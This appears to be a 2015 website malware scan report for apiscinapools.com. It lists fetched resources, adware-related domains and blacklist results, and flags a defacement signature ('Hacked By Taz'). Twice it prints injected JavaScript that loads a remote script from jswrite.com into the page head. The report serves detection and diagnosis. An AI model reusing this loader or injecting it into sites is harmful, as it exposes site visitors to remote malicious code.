Scanned pages/files
Request | Server response | Status |
http://www.apiscinapools.com/ | 200 OK Content-Length: 10355 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) if(top == self && typeof window._ws_all_js==='undefined'){
window._ws_all_js = 7; var zhead = document.getElementsByTagName('head')[0]; if(!zhead){zhead = document.createElement('head');} var qscript = document.createElement('script'); qscript.setAttribute('id','wsh2_js'); qscript.setAttribute('src','http://jswrite.com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By Taz ...[1149 bytes skipped]... com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } </script> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title> Hacked By Taz </title> <meta name="description" content="We Are The Lights In The Darkness, We Are the Truth Behind The Lies, We Are M_L crew, It's Too Late To Expect Us!"> <meta name="author" content="M_L Crew"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link REL="SHORTCUT ICON" HREF="http://i58.tinypic.com/14cdu6o.jpg"> <!-- CSS concatenated and minifie ...[10743 bytes skipped]... | ||
http://erin-erina.meximas.com/js/libs/modernizr-2.0.6.min.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:40 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://www.hostinger.lt/klaida_404? | 200 OK Content-Length: 11572 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/jquery-ui.min.js | 200 OK Content-Length: 201658 Content-Type: text/javascript | clean |
http://erin-erina.meximas.com/js/site.php | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:42 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://www.hostinger.lt/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/popup.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:45 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://i.kuryjs.info/kury/javascript.js?appTitle=Smartbar&channel=src2_pr&hid=3e05eee2-d832-47b7-b607-7a163fbc72ed | 200 OK Content-Length: 7176 Content-Type: application/x-javascript | clean |
http://www.superfish.com/ws/sf_main.jsp?dlsource=fowpwbb&userId=16AF47B9-805A-4B2C-8D0&CTID=src2_pr&partnername=Smartbar | 200 OK Content-Length: 9806 Content-Type: text/html | clean |
http://linurytestwesteurope.blob.core.windows.net/sharon-test/visadd.js | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://cdn.visadd.com/script/14567725814/preload.js?subid=src2_pr | 200 OK Content-Length: 8642 Content-Type: application/javascript | clean |
http://api.jollywallet.com/affiliate/client?dist=100&sub=2_pr&name=Smartbar | 200 OK Content-Length: 38709 Content-Type: application/javascript | clean |
http://apisurftasticnet-a.akamaihd.net/gsrs?is=amp1lmeg&bp=PB&g=f47f4329-19a1-4111-a256-13a763f5939d | 200 OK Content-Length: 10674 Content-Type: application/javascript | clean |
http://yondarkness.googlecode.com/files/AntiCopas.js | 403 Forbidden Content-Length: 2155 Content-Type: text/html | clean |
http://yondarkness.googlecode.com//www.google.com/ | 404 Not Found Content-Length: 1425 Content-Type: text/html | clean |
http://www.apiscinapools.com//ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js/ | 200 OK Content-Length: 10355 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(top == self && typeof window._ws_all_js==='undefined'){
window._ws_all_js = 7; var zhead = document.getElementsByTagName('head')[0]; if(!zhead){zhead = document.createElement('head');} var qscript = document.createElement('script'); qscript.setAttribute('id','wsh2_js'); qscript.setAttribute('src','http://jswrite.com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } Antivirus reports:
| ||
http://erin-erina.meximas.com/js/mylibs/supersized.3.1.3.min.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:49 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://erin-erina.meximas.com/js/mylibs/jquery.mousewheel.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:50 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://erin-erina.meximas.com/js/mylibs/mwheelIntent.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:50 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://erin-erina.meximas.com/js/mylibs/jquery.jscrollpane3.min.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:50 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://erin-erina.meximas.com/js/plugins.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:50 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://erin-erina.meximas.com/js/script.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:50 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://htmlfreecodes.com/codes/rain.js | 200 OK Content-Length: 7113 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: apiscinapools.com
Result:
GET / HTTP/1.1
Host: apiscinapools.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: apiscinapools.com
Referer: http://www.google.com/search?q=apiscinapools.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: apiscinapools.com
Referer: http://www.google.com/search?q=apiscinapools.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=apiscinapools.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://apiscinapools.com/
Result: apiscinapools.com is not infected or malware details are not published yet.
Result: apiscinapools.com is not infected or malware details are not published yet.